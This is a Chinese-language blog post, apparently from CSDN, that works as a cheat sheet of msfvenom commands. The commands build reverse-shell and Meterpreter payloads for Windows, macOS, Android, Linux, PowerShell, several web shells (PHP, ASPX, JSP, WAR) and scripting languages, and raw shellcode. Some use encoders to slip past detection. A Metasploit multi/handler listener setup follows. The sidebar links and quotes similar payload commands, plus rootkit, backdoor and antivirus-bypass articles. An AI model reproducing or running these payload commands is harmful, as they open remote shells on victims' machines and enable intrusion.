msfvenom常用payload

最新推荐文章于 2024-04-23 22:18:28 发布
最新推荐文章于 2024-04-23 22:18:28 发布
阅读量410 收藏 4
点赞数
文章标签: linux cmd telnet centos 交换机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/itgougou_/article/details/111659907
版权

payload命令

windows:

msfvenom-a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o
payload.exe

mac:

msfvenom-a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f macho -o payload.macho

android:

//需要签名
msfvenom-a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f apk -o payload.apk

powershell:

msfvenom-a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

linux:

msfvenom-a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f elf -o payload.elf

php:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=
<Your Port to Connect On>-f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

aspx:

msfvenom-a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspxjsp:
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻
击机端口 -f raw -o payload.jsp

war:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口-f raw -
o payload.war

nodejs:

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口-f raw -o
payload.js

python:

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -
f raw -o payload.py

perl:

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口-f raw -o
payload.pl

ruby:

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口-f raw -o
payload.rb

lua:

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口-f raw -o
payload.lua

windows shellcode:

msfvenom-a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=
攻击机IP LPORT=攻击机端口 -f c

linux shellcode:

msfvenom-a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻
击机IP LPORT=攻击机端口 -f c

mac shellcode:

msfvenom-a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP
LPORT=攻击机端口 -f c

常用监听

cmd/unix/reverse_bash

php/meterpreter/reverse_tcp

windows/x64/meterpreter_reverse_tcp

使用

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 1.0.0.2 set lport 443 run
Three ooo
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msfvenom-backdoor-android:Android后门应用程序,msfvenom android .apk的改进源代码-Android app source code
03-24
msfvenom-backdoor-android 此Android Studio项目包含由生成的后门.apk的源代码 $msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk (在Kali Linux套件中) 有关渗透到Android系统的过程指南,请访问我的网站(仅意大利语) 尝试解决问题: [*]Meterpreter session x closed - Reason:died 消息,通过在服务中启动有效负载来实现。 Meterpreter会话以这种方式更加稳定(原始的msfvenom apk通常会导致会话很快终止) 在此项目中,后门可在LAN设置中工作,在端口4444上打开到192.168.178.30的Meterpreter会话(如果要在WA
Linux权限维持—后门篇
yy
04-18 3591
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的
termux怎么生成木马_msfvenom 木马生成(常用
weixin_39622901的博客
12-21 711
Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST= ...
生成payload
分享学习网络的点点滴滴
12-30 575
【代码】生成payload
Rootkit实战——ls篇
FL_ybz的博客
11-05 5149
rootkit科普:Rootkit是一个或者多个用于隐藏、控制一台计算机的工具包,该技术被越来越多地应用于一些恶意软件中。在基于Windows的系统中Rootkit更多地用于隐藏程序或进程,系统被注入Rootkit后就可以在不为用户察觉的情况下进行某些操作。因此,其隐蔽性极高,危害也极大。 rootkit工作原理:攻击者想要在受害者的电脑上搞破坏时,比如装后门程序,总会留下一些蛛丝马迹,而受害者
【MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 6263
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
Metasploit (MSF) 使用:包含基本使用payload生成、后渗透模块使用
Alone hackers的博客
03-06 4180
Metasploit (MSF) 使用:包含基本使用payload生成,后渗透模块使用
msfvenom常用生成payload命令(第十课).docx
09-15
msfvenom常用生成payload命令(第十课).docx
msfvenom常用生成payload命令(第十课)1
08-03
专注APT攻击与防御msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机I
msfvenom获取shell
01-03
仅用于测试 msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/...LPORT=攻击机端口 -f macho -o payload.ma
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行...
payload-dumper-解包
03-22
解包payload.bin文件,获取系统的相关.img文件。亲测有效。
msfvenom参数使用
xj28555的博客
08-08 1419
-l、 --list<type>列出[type]的所有模块。类型有:有效载荷、编码器、nop、平台、arch、encrypt、format、all -p、 --payload<payload>要使用payload(--list payloads to list,--列出参数的选项)。为自定义指定“-”或STDIN --list options list——payload<value>的标准、高级和规避选项 -f、 --格式(使用格式>列表) -e、 --编
MSF学习笔记
B_l_a_nk的博客
04-05 1605
MSF工具学习
MSF基本使用(基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 5775
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
MSF渗透测试之msfvenom提权之python
lza20001103的博客
04-05 3373
MSF渗透测试之msfvenom提权之python
msf渗透练习-php后门反弹
weixin_49349476的博客
06-09 2277
php后门反弹,就是通过php的后门文件,对目标进行操控。本次使用msf完成(仅供学习)
python调用msf_MSF利用python反弹shell-Bypass AV
weixin_39883079的博客
11-30 1550
本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shellmsf-python反弹shell姿势11) msfvenom生成python后门msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=...
13 Linux实操篇-网络配置
最新发布
qq_74289024的博客
04-23 930
子网ip 与网关。
msfvenom常用命令含义
05-31
以下msfvenom常用的命令含义: 1. -p:指定payload类型,例如windows/meterpreter/reverse_tcp。 2. -f:指定输出格式,例如exe、raw、python等。 3. -o:指定输出文件名。 4. -a:指定payload架构,例如x86、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值